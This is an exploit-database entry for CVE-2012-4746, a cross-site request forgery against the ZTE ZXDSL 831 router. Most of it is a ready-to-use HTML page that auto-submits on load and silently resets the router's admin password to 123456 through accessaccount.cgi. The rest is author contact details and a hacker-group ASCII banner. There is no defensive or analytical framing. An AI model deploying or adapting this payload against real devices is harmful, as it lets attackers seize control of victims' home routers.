ZTE - Change Admin Password

Author: Nuevo Asesino
type: webapps
platform: cgi
port: 
date_added: 2012-04-08 
date_updated: 2012-04-08 
verified: 0 
codes: OSVDB-76924;CVE-2012-4746 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: ZTE Change admin password
# Author: Nuevo Asesino
# Version: ZTE Inc., Software Release ZXDSL 831IIV7.5.0a_Z29_OV
#################################################################################################
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>Exploit By Nuevo Asesino </H2>
<form method="POST" name="form0" action="http:\192.168.1.1\accessaccount.cgi?sysPassword=123456">
</form>
</body>
</html> ##################################################################################################
password ======> 123456
Now you can get the username & the password------------------------------------------------------Contact  :Oeb1590@hotmail.comFacebook : Https:\www.facebook.com\Want.Revenge
              \|||/           .-.________                (o o)                ________.-.     -----/ \_)_______)  +----------oooO------------+   (_______(_/   \------         (    ()___)         The Blacke Devils               (___()    )               ()__)                                         (__()         ----\___()_)         Algeria Warriors                (_()___/-----                                                            +-------------Ooo----------+                                In:Arab47.com